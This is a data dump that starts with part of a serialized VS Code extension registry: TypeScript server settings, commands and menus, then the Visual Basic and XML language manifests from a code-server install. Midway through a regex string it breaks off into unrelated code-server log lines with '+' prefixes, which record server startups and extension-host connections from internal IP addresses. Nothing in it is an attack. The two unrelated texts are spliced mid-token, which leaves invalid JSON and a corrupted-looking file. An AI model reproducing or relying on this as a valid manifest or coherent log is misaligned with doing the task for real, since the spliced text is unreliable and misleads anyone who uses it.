is installed for [Automatic Type Acquisition](https://code.visualstudio.com/docs/nodejs/working-with-javascript#_typings-and-automatic-type-acquisition).","scope":"window"},"typescript.tsserver.web.projectWideIntellisense.enabled":{"type":"boolean","default":true,"description":"Enable/disable project-wide IntelliSense on web. Requires that VS Code is running in a trusted context.","scope":"window"},"typescript.tsserver.web.projectWideIntellisense.suppressSemanticErrors":{"type":"boolean","default":false,"description":"Suppresses semantic errors on web even when project wide IntelliSense is enabled. This is always on when project wide IntelliSense is not enabled or available. See `#typescript.tsserver.web.projectWideIntellisense.enabled#`","scope":"window"},"typescript.tsserver.web.typeAcquisition.enabled":{"type":"boolean","default":true,"description":"Enable/disable package acquisition on the web. This enables IntelliSense for imported packages. Requires `#typescript.tsserver.web.projectWideIntellisense.enabled#`. Currently not supported for Safari.","scope":"window"},"typescript.tsserver.useSyntaxServer":{"type":"string","scope":"window","description":"Controls if TypeScript launches a dedicated server to more quickly handle syntax related operations, such as computing code folding.","default":"auto","enum":["always","never","auto"],"enumDescriptions":["Use a lighter weight syntax server to handle all IntelliSense operations. This syntax server can only provide IntelliSense for opened files.","Don't use a dedicated syntax server. Use a single server to handle all IntelliSense operations.","Spawn both a full server and a lighter weight server dedicated to syntax operations. The syntax server is used to speed up syntax operations and provide IntelliSense while projects are loading."]},"typescript.tsserver.maxTsServerMemory":{"type":"number","default":3072,"markdownDescription":"The maximum amount of memory (in MB) to allocate to the TypeScript server process. To use a memory limit greater than 4 GB, use `#typescript.tsserver.nodePath#` to run TS Server with a custom Node installation.","scope":"window"},"typescript.tsserver.experimental.enableProjectDiagnostics":{"type":"boolean","default":false,"description":"Enables project wide error reporting.","scope":"window","tags":["experimental"]},"typescript.tsserver.watchOptions":{"description":"Configure which watching strategies should be used to keep track of files and directories.","scope":"window","default":"vscode","oneOf":[{"type":"string","const":"vscode","description":"Use VS Code's file watchers instead of TypeScript's. Requires using TypeScript 5.4+ in the workspace."},{"type":"object","properties":{"watchFile":{"type":"string","description":"Strategy for how individual files are watched.","enum":["fixedChunkSizePolling","fixedPollingInterval","priorityPollingInterval","dynamicPriorityPolling","useFsEvents","useFsEventsOnParentDirectory"],"enumDescriptions":["Polls files in chunks at regular interval.","Check every file for changes several times a second at a fixed interval.","Check every file for changes several times a second, but use heuristics to check certain types of files less frequently than others.","Use a dynamic queue where less-frequently modified files will be checked less often.","Attempt to use the operating system/file system's native events for file changes.","Attempt to use the operating system/file system's native events to listen for changes on a file's containing directories. This can use fewer file watchers, but might be less accurate."],"default":"useFsEvents"},"watchDirectory":{"type":"string","description":"Strategy for how entire directory trees are watched under systems that lack recursive file-watching functionality.","enum":["fixedChunkSizePolling","fixedPollingInterval","dynamicPriorityPolling","useFsEvents"],"enumDescriptions":["Polls directories in chunks at regular interval.","Check every directory for changes several times a second at a fixed interval.","Use a dynamic queue where less-frequently modified directories will be checked less often.","Attempt to use the operating system/file system's native events for directory changes."],"default":"useFsEvents"},"fallbackPolling":{"type":"string","description":"When using file system events, this option specifies the polling strategy that gets used when the system runs out of native file watchers and/or doesn't support native file watchers.","enum":["fixedPollingInterval","priorityPollingInterval","dynamicPriorityPolling"],"enumDescriptions":["configuration.tsserver.watchOptions.fallbackPolling.fixedPollingInterval","configuration.tsserver.watchOptions.fallbackPolling.priorityPollingInterval","configuration.tsserver.watchOptions.fallbackPolling.dynamicPriorityPolling"]},"synchronousWatchDirectory":{"type":"boolean","description":"Disable deferred watching on directories. Deferred watching is useful when lots of file changes might occur at once (e.g. a change in node_modules from running npm install), but you might want to disable it with this flag for some less-common setups."}}}]},"typescript.tsserver.enableTracing":{"type":"boolean","default":false,"description":"Enables tracing TS server performance to a directory. These trace files can be used to diagnose TS Server performance issues. The log may contain file paths, source code, and other potentially sensitive information from your project.","scope":"window"},"typescript.tsserver.log":{"type":"string","enum":["off","terse","normal","verbose","requestTime"],"default":"off","description":"Enables logging of the TS server to a file. This log can be used to diagnose TS Server issues. The log may contain file paths, source code, and other potentially sensitive information from your project.","scope":"window"},"typescript.tsserver.pluginPaths":{"type":"array","items":{"type":"string","description":"Either an absolute or relative path. Relative path will be resolved against workspace folder(s)."},"default":[],"description":"Additional paths to discover TypeScript Language Service plugins.","scope":"machine"}}}],"commands":[{"command":"typescript.reloadProjects","title":"Reload Project","category":"TypeScript"},{"command":"javascript.reloadProjects","title":"Reload Project","category":"JavaScript"},{"command":"typescript.selectTypeScriptVersion","title":"Select TypeScript Version...","category":"TypeScript"},{"command":"typescript.goToProjectConfig","title":"Go to Project Configuration (tsconfig)","category":"TypeScript"},{"command":"javascript.goToProjectConfig","title":"Go to Project Configuration (jsconfig / tsconfig)","category":"JavaScript"},{"command":"typescript.openTsServerLog","title":"Open TS Server log","category":"TypeScript"},{"command":"typescript.restartTsServer","title":"Restart TS Server","category":"TypeScript"},{"command":"typescript.findAllFileReferences","title":"Find File References","category":"TypeScript"},{"command":"typescript.goToSourceDefinition","title":"Go to Source Definition","category":"TypeScript"},{"command":"typescript.sortImports","title":"Sort Imports","category":"TypeScript"},{"command":"javascript.sortImports","title":"Sort Imports","category":"JavaScript"},{"command":"typescript.removeUnusedImports","title":"Remove Unused Imports","category":"TypeScript"},{"command":"javascript.removeUnusedImports","title":"Remove Unused Imports","category":"JavaScript"},{"command":"typescript.experimental.enableTsgo","title":"Use TypeScript Go (Experimental)","category":"TypeScript","enablement":"!config.typescript.experimental.useTsgo && config.typescript-go.executablePath"},{"command":"typescript.experimental.disableTsgo","title":"Stop using TypeScript Go (Experimental)","category":"TypeScript","enablement":"config.typescript.experimental.useTsgo"}],"menus":{"commandPalette":[{"command":"typescript.reloadProjects","when":"editorLangId == typescript && typescript.isManagedFile"},{"command":"typescript.reloadProjects","when":"editorLangId == typescriptreact && typescript.isManagedFile"},{"command":"javascript.reloadProjects","when":"editorLangId == javascript && typescript.isManagedFile"},{"command":"javascript.reloadProjects","when":"editorLangId == javascriptreact && typescript.isManagedFile"},{"command":"typescript.goToProjectConfig","when":"editorLangId == typescript && typescript.isManagedFile"},{"command":"typescript.goToProjectConfig","when":"editorLangId == typescriptreact && typescript.isManagedFile"},{"command":"javascript.goToProjectConfig","when":"editorLangId == javascript && typescript.isManagedFile"},{"command":"javascript.goToProjectConfig","when":"editorLangId == javascriptreact && typescript.isManagedFile"},{"command":"typescript.selectTypeScriptVersion","when":"typescript.isManagedFile"},{"command":"typescript.openTsServerLog","when":"typescript.isManagedFile"},{"command":"typescript.restartTsServer","when":"typescript.isManagedFile"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && typescript.isManagedFile"},{"command":"typescript.goToSourceDefinition","when":"tsSupportsSourceDefinition && typescript.isManagedFile"},{"command":"typescript.sortImports","when":"supportedCodeAction =~ /(\\s|^)source\\.sortImports\\b/ && editorLangId =~ /^typescript(react)?$/"},{"command":"javascript.sortImports","when":"supportedCodeAction =~ /(\\s|^)source\\.sortImports\\b/ && editorLangId =~ /^javascript(react)?$/"},{"command":"typescript.removeUnusedImports","when":"supportedCodeAction =~ /(\\s|^)source\\.removeUnusedImports\\b/ && editorLangId =~ /^typescript(react)?$/"},{"command":"javascript.removeUnusedImports","when":"supportedCodeAction =~ /(\\s|^)source\\.removeUnusedImports\\b/ && editorLangId =~ /^javascript(react)?$/"}],"editor/context":[{"command":"typescript.goToSourceDefinition","when":"!config.typescript.experimental.useTsgo && tsSupportsSourceDefinition && (resourceLangId == typescript || resourceLangId == typescriptreact || resourceLangId == javascript || resourceLangId == javascriptreact)","group":"navigation@1.41"}],"explorer/context":[{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == typescript","group":"4_search"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == typescriptreact","group":"4_search"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == javascript","group":"4_search"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == javascriptreact","group":"4_search"}],"editor/title/context":[{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == javascript"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == javascriptreact"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == typescript"},{"command":"typescript.findAllFileReferences","when":"tsSupportsFileReferences && resourceLangId == typescriptreact"}]},"breakpoints":[{"language":"typescript"},{"language":"typescriptreact"}],"taskDefinitions":[{"type":"typescript","required":["tsconfig"],"properties":{"tsconfig":{"type":"string","description":"The tsconfig file that defines the TS build."},"option":{"type":"string"}},"when":"shellExecutionSupported"}],"problemPatterns":[{"name":"tsc","regexp":"^([^\\s].*)[\\(:](\\d+)[,:](\\d+)(?:\\):\\s+|\\s+-\\s+)(error|warning|info)\\s+TS(\\d+)\\s*:\\s*(.*)$","file":1,"line":2,"column":3,"severity":4,"code":5,"message":6}],"problemMatchers":[{"name":"tsc","label":"TypeScript problems","owner":"typescript","source":"ts","applyTo":"closedDocuments","fileLocation":["relative","${cwd}"],"pattern":"$tsc"},{"name":"tsgo-watch","label":"TypeScript problems (watch mode)","owner":"typescript","source":"ts","applyTo":"closedDocuments","fileLocation":["relative","${cwd}"],"pattern":"$tsc","background":{"activeOnStart":true,"beginsPattern":{"regexp":"^build starting at .*$"},"endsPattern":{"regexp":"^build finished in .*$"}}},{"name":"tsc-watch","label":"TypeScript problems (watch mode)","owner":"typescript","source":"ts","applyTo":"closedDocuments","fileLocation":["relative","${cwd}"],"pattern":"$tsc","background":{"activeOnStart":true,"beginsPattern":{"regexp":"^\\s*(?:message TS6032:|\\[?\\D*.{1,2}[:.].{1,2}[:.].{1,2}\\D*(├\\D*\\d{1,2}\\D+┤)?(?:\\]| -)) (Starting compilation in watch mode|File change detected\\. Starting incremental compilation)\\.\\.\\."},"endsPattern":{"regexp":"^\\s*(?:message TS6042:|\\[?\\D*.{1,2}[:.].{1,2}[:.].{1,2}\\D*(├\\D*\\d{1,2}\\D+┤)?(?:\\]| -)) (?:Compilation complete\\.|Found \\d+ errors?\\.) Watching for file changes\\."}}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/typescript-language-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.vb"},"manifest":{"name":"vb","displayName":"Visual Basic Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in Visual Basic files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin textmate/asp.vb.net.tmbundle Syntaxes/ASP%20VB.net.plist ./syntaxes/asp-vb-net.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"vb","extensions":[".vb",".brs",".vbs",".bas",".vba"],"aliases":["Visual Basic","vb"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"vb","scopeName":"source.asp.vb.net","path":"./syntaxes/asp-vb-net.tmLanguage.json"}],"snippets":[{"language":"vb","path":"./snippets/vb.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/vb","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.xml"},"manifest":{"name":"xml","displayName":"XML Language Basics","description":"Provides syntax highlighting and bracket matching in XML files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"xml","extensions":[".xml",".xsd",".ascx",".atom",".axml",".axaml",".bpmn",".cpt",".csl",".csproj",".csproj.user",".dita",".ditamap",".dtd",".ent",".mod",".dtml",".fsproj",".fxml",".iml",".isml",".jmx",".launch",".menu",".mxml",".nuspec",".opml",".owl",".proj",".props",".pt",".publishsettings",".pubxml",".pubxml.user",".rbxlx",".rbxmx",".rdf",".rng",".rss",".shproj",".slnx",".storyboard",".svg",".targets",".tld",".tmx",".vbproj",".vbproj.user",".vcxproj",".vcxproj.filters",".wsdl",".wxi",".wxl",".wxs",".xaml",".xbl",".xib",".xlf",".xliff",".xpdl",".xul",".xoml"],"firstLine":"(\\<\\?xml.*)|(\\ Launched Extension Host Process. +[23:35:18] [192.168.100.179][0dc17bb4][ExtensionHostConnection] <529> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[23:36:17] [192.168.100.179][0a91f1c6][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[23:36:17] [192.168.100.179][0dc17bb4][ExtensionHostConnection] <529> Extension Host Process exited with code: 0, signal: null. +[23:36:18] [192.168.100.179][eca0f46b][ManagementConnection] New connection established. +[23:36:18] [192.168.100.179][d389591f][ExtensionHostConnection] New connection established. +[23:36:18] [192.168.100.179][d389591f][ExtensionHostConnection] <1219> Launched Extension Host Process. +[23:36:19] [192.168.100.179][d389591f][ExtensionHostConnection] <1219> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[23:38:38] [192.168.100.179][eca0f46b][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[23:38:38] [192.168.100.179][d389591f][ExtensionHostConnection] <1219> Extension Host Process exited with code: 0, signal: null. +[23:38:40] [192.168.100.179][c785d7ca][ManagementConnection] New connection established. +[23:38:40] [192.168.100.179][571fc8d1][ExtensionHostConnection] New connection established. +[23:38:40] [192.168.100.179][571fc8d1][ExtensionHostConnection] <2066> Launched Extension Host Process. +[23:38:40] [192.168.100.179][571fc8d1][ExtensionHostConnection] <2066> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[00:08:21] [192.168.100.179][c785d7ca][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[00:08:21] [192.168.100.179][571fc8d1][ExtensionHostConnection] <2066> Extension Host Process exited with code: 0, signal: null. +[00:10:10] [172.18.0.2][3f327581][ManagementConnection] New connection established. +[00:10:12] [172.18.0.2][7bf6560d][ExtensionHostConnection] New connection established. +[00:10:12] [172.18.0.2][7bf6560d][ExtensionHostConnection] <11311> Launched Extension Host Process. +[00:10:12] [172.18.0.2][7bf6560d][ExtensionHostConnection] <11311> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[00:11:04] [172.18.0.2][3f327581][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +[03:10:47] [172.18.0.2][7bf6560d][ExtensionHostConnection] <11311> Extension Host Process exited with code: 0, signal: null. +[03:11:14] [172.18.0.2][3f327581][ManagementConnection] The reconnection grace time of 3h has expired, so the connection will be disposed. +[07:11:56] [172.18.0.2][d87111a1][ManagementConnection] New connection established. +[07:11:57] [172.18.0.2][a6a61b75][ExtensionHostConnection] New connection established. +[07:11:57] [172.18.0.2][a6a61b75][ExtensionHostConnection] <43703> Launched Extension Host Process. +[07:11:57] [172.18.0.2][a6a61b75][ExtensionHostConnection] <43703> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[07:12:17] [172.18.0.2][d87111a1][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[07:12:17] [172.18.0.2][a6a61b75][ExtensionHostConnection] <43703> Extension Host Process exited with code: 0, signal: null. +[07:12:18] [172.18.0.2][dfd7ddb5][ManagementConnection] New connection established. +[07:12:18] [172.18.0.2][1e9987af][ExtensionHostConnection] New connection established. +[07:12:18] [172.18.0.2][1e9987af][ExtensionHostConnection] <44182> Launched Extension Host Process. +[07:12:19] [172.18.0.2][1e9987af][ExtensionHostConnection] <44182> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[07:12:45] [172.18.0.2][dfd7ddb5][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[07:12:45] [172.18.0.2][1e9987af][ExtensionHostConnection] <44182> Extension Host Process exited with code: 0, signal: null. +[07:12:46] [172.18.0.2][cb4ed6b1][ManagementConnection] New connection established. +[07:12:46] [172.18.0.2][04b32aef][ExtensionHostConnection] New connection established. +[07:12:46] [172.18.0.2][04b32aef][ExtensionHostConnection] <44738> Launched Extension Host Process. +[07:12:47] [172.18.0.2][04b32aef][ExtensionHostConnection] <44738> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[07:13:12] [172.18.0.2][cb4ed6b1][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[07:13:12] [172.18.0.2][04b32aef][ExtensionHostConnection] <44738> Extension Host Process exited with code: 0, signal: null. +[07:13:21] [172.18.0.2][72c41d51][ManagementConnection] New connection established. +[07:13:22] [172.18.0.2][d136bb6b][ExtensionHostConnection] New connection established. +[07:13:22] [172.18.0.2][d136bb6b][ExtensionHostConnection] <45273> Launched Extension Host Process. +[07:13:22] [172.18.0.2][d136bb6b][ExtensionHostConnection] <45273> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[07:13:28] [172.18.0.2][72c41d51][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[07:13:28] [172.18.0.2][d136bb6b][ExtensionHostConnection] <45273> Extension Host Process exited with code: 0, signal: null. +[07:13:30] [172.18.0.2][3266a2bb][ManagementConnection] New connection established. +[07:13:30] [172.18.0.2][8e415823][ExtensionHostConnection] New connection established. +[07:13:30] [172.18.0.2][8e415823][ExtensionHostConnection] <45724> Launched Extension Host Process. +[07:13:30] [172.18.0.2][8e415823][ExtensionHostConnection] <45724> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[07:13:38] [172.18.0.2][3266a2bb][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[07:13:38] [172.18.0.2][8e415823][ExtensionHostConnection] <45724> Extension Host Process exited with code: 0, signal: null. +[07:13:39] [172.18.0.2][f90052c8][ManagementConnection] New connection established. +[07:13:40] [172.18.0.2][8c1eb48d][ExtensionHostConnection] New connection established. +[07:13:40] [172.18.0.2][8c1eb48d][ExtensionHostConnection] <46172> Launched Extension Host Process. +[07:13:40] [172.18.0.2][8c1eb48d][ExtensionHostConnection] <46172> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[10:30:48] [172.18.0.2][8c1eb48d][ExtensionHostConnection] <46172> Extension Host Process exited with code: null, signal: SIGTERM. +[2026-01-26T15:42:04.787Z] info code-server 4.108.1 ba588b47099b31ad9734ef05534e9813bae22c64 +[2026-01-26T15:42:04.792Z] info Using user-data-dir /root/.local/share/code-server +[2026-01-26T15:42:04.820Z] info Using config file /root/.config/code-server/config.yaml +[2026-01-26T15:42:04.820Z] info HTTP server listening on http://0.0.0.0:8080/ +[2026-01-26T15:42:04.820Z] info - Authentication is enabled +[2026-01-26T15:42:04.820Z] info - Using password from $PASSWORD +[2026-01-26T15:42:04.820Z] info - Not serving HTTPS +[2026-01-26T15:42:04.820Z] info Session server listening on /root/.local/share/code-server/code-server-ipc.sock +[16:44:51] + + + + +[reconnection-grace-time] No CLI argument provided, using default: 10800000ms (10800s) +[16:44:51] Extension host agent started. +[16:44:55] [192.168.100.179][56241436][ManagementConnection] New connection established. +[16:44:56] [192.168.100.179][bf2ed5dd][ExtensionHostConnection] New connection established. +[16:44:56] [192.168.100.179][bf2ed5dd][ExtensionHostConnection] <530> Launched Extension Host Process. +[16:44:56] [192.168.100.179][bf2ed5dd][ExtensionHostConnection] <530> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[2026-01-26T16:45:41.728Z] info code-server 4.108.1 ba588b47099b31ad9734ef05534e9813bae22c64 +[2026-01-26T16:45:41.731Z] info Using user-data-dir /root/.local/share/code-server +[2026-01-26T16:45:41.753Z] info Using config file /root/.config/code-server/config.yaml +[2026-01-26T16:45:41.754Z] info HTTP server listening on http://0.0.0.0:8080/ +[2026-01-26T16:45:41.754Z] info - Authentication is enabled +[2026-01-26T16:45:41.754Z] info - Using password from $PASSWORD +[2026-01-26T16:45:41.754Z] info - Not serving HTTPS +[2026-01-26T16:45:41.754Z] info Session server listening on /root/.local/share/code-server/code-server-ipc.sock +[17:45:43] + + + + +[reconnection-grace-time] No CLI argument provided, using default: 10800000ms (10800s) +[17:45:43] Extension host agent started. +[19:32:03] [192.168.100.179][488849cb][ManagementConnection] New connection established. +[19:32:04] [192.168.100.179][5dcb9822][ExtensionHostConnection] New connection established. +[19:32:04] [192.168.100.179][5dcb9822][ExtensionHostConnection] <483> Launched Extension Host Process. +[19:32:04] [192.168.100.179][5dcb9822][ExtensionHostConnection] <483> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[20:20:30] [192.168.100.179][488849cb][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[20:20:31] [192.168.100.179][5dcb9822][ExtensionHostConnection] <483> Extension Host Process exited with code: 0, signal: null. +[20:26:21] [192.168.100.179][474810db][ManagementConnection] New connection established. +[20:26:22] [192.168.100.179][48947a3b][ExtensionHostConnection] New connection established. +[20:26:22] [192.168.100.179][48947a3b][ExtensionHostConnection] <9634> Launched Extension Host Process. +[20:26:22] [192.168.100.179][48947a3b][ExtensionHostConnection] <9634> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[22:43:04] [192.168.100.179][474810db][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[22:43:04] [192.168.100.179][48947a3b][ExtensionHostConnection] <9634> Extension Host Process exited with code: 0, signal: null. +[22:43:05] [192.168.100.179][423316e4][ManagementConnection] New connection established. +[22:43:06] [192.168.100.179][3b181445][ExtensionHostConnection] New connection established. +[22:43:06] [192.168.100.179][3b181445][ExtensionHostConnection] <34224> Launched Extension Host Process. +[22:43:06] [192.168.100.179][3b181445][ExtensionHostConnection] <34224> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[00:13:42] [192.168.100.179][423316e4][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[00:13:42] [192.168.100.179][3b181445][ExtensionHostConnection] <34224> Extension Host Process exited with code: 0, signal: null. +[07:59:57] [172.18.0.2][43ec8ed5][ManagementConnection] New connection established. +[07:59:58] [172.18.0.2][d373c672][ExtensionHostConnection] New connection established. +[07:59:58] [172.18.0.2][d373c672][ExtensionHostConnection] <50764> Launched Extension Host Process. +[07:59:58] [172.18.0.2][d373c672][ExtensionHostConnection] <50764> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[11:00:43] [172.18.0.2][43ec8ed5][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[11:00:43] [172.18.0.2][d373c672][ExtensionHostConnection] <50764> Extension Host Process exited with code: 0, signal: null. +[18:12:58] [192.168.100.179][fc0468f4][ManagementConnection] New connection established. +[18:12:59] [192.168.100.179][f73059e6][ExtensionHostConnection] New connection established. +[18:12:59] [192.168.100.179][f73059e6][ExtensionHostConnection] <83902> Launched Extension Host Process. +[18:12:59] [192.168.100.179][f73059e6][ExtensionHostConnection] <83902> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[22:09:45] [192.168.100.179][fc0468f4][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[22:09:45] [192.168.100.179][f73059e6][ExtensionHostConnection] <83902> Extension Host Process exited with code: 0, signal: null. +[22:09:46] [192.168.100.179][186a7769][ManagementConnection] New connection established. +[22:09:47] [192.168.100.179][210f32e2][ExtensionHostConnection] New connection established. +[22:09:47] [192.168.100.179][210f32e2][ExtensionHostConnection] <126234> Launched Extension Host Process. +[22:09:47] [192.168.100.179][210f32e2][ExtensionHostConnection] <126234> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[00:37:30] [192.168.100.179][186a7769][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[00:37:30] [192.168.100.179][210f32e2][ExtensionHostConnection] <126234> Extension Host Process exited with code: 0, signal: null. +[07:50:35] [172.18.0.2][ceeb9d9b][ManagementConnection] New connection established. +[07:50:38] [172.18.0.2][83456df2][ExtensionHostConnection] New connection established. +[07:50:38] [172.18.0.2][83456df2][ExtensionHostConnection] <152964> Launched Extension Host Process. +[07:50:39] [172.18.0.2][83456df2][ExtensionHostConnection] <152964> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[13:31:24] [172.18.0.2][ceeb9d9b][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[13:31:24] [172.18.0.2][83456df2][ExtensionHostConnection] <152964> Extension Host Process exited with code: 0, signal: null. +[19:56:56] [192.168.100.179][739ab47b][ManagementConnection] New connection established. +[19:56:57] [192.168.100.179][131d88d2][ExtensionHostConnection] New connection established. +[19:56:57] [192.168.100.179][131d88d2][ExtensionHostConnection] <218766> Launched Extension Host Process. +[19:56:57] [192.168.100.179][131d88d2][ExtensionHostConnection] <218766> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[2026-01-28T23:19:48.162Z] info code-server 4.108.1 ba588b47099b31ad9734ef05534e9813bae22c64 +[2026-01-28T23:19:48.163Z] info Using user-data-dir /root/.local/share/code-server +[2026-01-28T23:19:48.177Z] info Using config file /root/.config/code-server/config.yaml +[2026-01-28T23:19:48.178Z] info HTTP server listening on http://0.0.0.0:8080/ +[2026-01-28T23:19:48.178Z] info - Authentication is enabled +[2026-01-28T23:19:48.178Z] info - Using password from $PASSWORD +[2026-01-28T23:19:48.178Z] info - Not serving HTTPS +[2026-01-28T23:19:48.178Z] info Session server listening on /root/.local/share/code-server/code-server-ipc.sock +[00:19:48] + + + + +[reconnection-grace-time] No CLI argument provided, using default: 10800000ms (10800s) +[00:19:48] Extension host agent started. +[00:21:13] [192.168.100.179][dd418480][ManagementConnection] New connection established. +[00:21:14] [192.168.100.179][fba0e324][ExtensionHostConnection] New connection established. +[00:21:14] [192.168.100.179][fba0e324][ExtensionHostConnection] <481> Launched Extension Host Process. +[00:21:14] [192.168.100.179][fba0e324][ExtensionHostConnection] <481> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[01:16:26] [192.168.100.179][dd418480][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[01:16:27] [192.168.100.179][fba0e324][ExtensionHostConnection] <481> Extension Host Process exited with code: 0, signal: null. +[07:45:18] [172.18.0.2][be6bb2b3][ManagementConnection] New connection established. +[07:45:21] [172.18.0.2][75b390ac][ExtensionHostConnection] New connection established. +[07:45:21] [172.18.0.2][75b390ac][ExtensionHostConnection] <10823> Launched Extension Host Process. +[07:45:21] [172.18.0.2][75b390ac][ExtensionHostConnection] <10823> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[09:15:46] [172.18.0.2][75b390ac][ExtensionHostConnection] The client has reconnected. +[09:15:46] [172.18.0.2][be6bb2b3][ManagementConnection] The client has reconnected. +[09:15:58] [172.18.0.2][be6bb2b3][ManagementConnection] The client has reconnected. +[09:15:58] [172.18.0.2][75b390ac][ExtensionHostConnection] The client has reconnected. +[09:17:41] [172.18.0.2][be6bb2b3][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +[09:19:56] [172.18.0.2][be6bb2b3][ManagementConnection] Another client has connected, will shorten the wait for reconnection 5m before disposing... +[09:19:56] [172.18.0.2][be6bb2b3][ManagementConnection] The client has reconnected. +[09:19:56] [172.18.0.2][75b390ac][ExtensionHostConnection] The client has reconnected. +[16:27:52] [172.18.0.2][be6bb2b3][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +[16:27:53] [172.18.0.2][75b390ac][ExtensionHostConnection] <10823> Extension Host Process exited with code: 0, signal: null. +[19:15:34] [192.168.100.179][ce4fbe60][ManagementConnection] New connection established. +[19:15:35] [192.168.100.179][713309c9][ExtensionHostConnection] New connection established. +[19:15:35] [192.168.100.179][713309c9][ExtensionHostConnection] <104591> Launched Extension Host Process. +[19:15:35] [192.168.100.179][713309c9][ExtensionHostConnection] <104591> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +[2026-01-29T20:32:38.103Z] info code-server 4.108.1 ba588b47099b31ad9734ef05534e9813bae22c64 +[2026-01-29T20:32:38.104Z] info Using user-data-dir /root/.local/share/code-server +[2026-01-29T20:32:38.118Z] info Using config file /root/.config/code-server/config.yaml +[2026-01-29T20:32:38.118Z] info HTTP server listening on http://0.0.0.0:8080/ +[2026-01-29T20:32:38.118Z] info - Authentication is enabled +[2026-01-29T20:32:38.118Z] info - Using password from $PASSWORD +[2026-01-29T20:32:38.118Z] info - Not serving HTTPS +[2026-01-29T20:32:38.118Z] info Session server listening on /root/.local/share/code-server/code-server-ipc.sock +[21:32:46] + + + + +[reconnection-grace-time] No CLI argument provided, using default: 10800000ms (10800s) +[21:32:46] Extension host agent started. +[21:35:37] [192.168.100.179][fc5af76c][ManagementConnection] New connection established. +[21:35:38] [192.168.100.179][9f4b60a3][ExtensionHostConnection] New connection established. +[21:35:38] [192.168.100.179][9f4b60a3][ExtensionHostConnection] <530> Launched Extension Host Process. +[21:35:38] 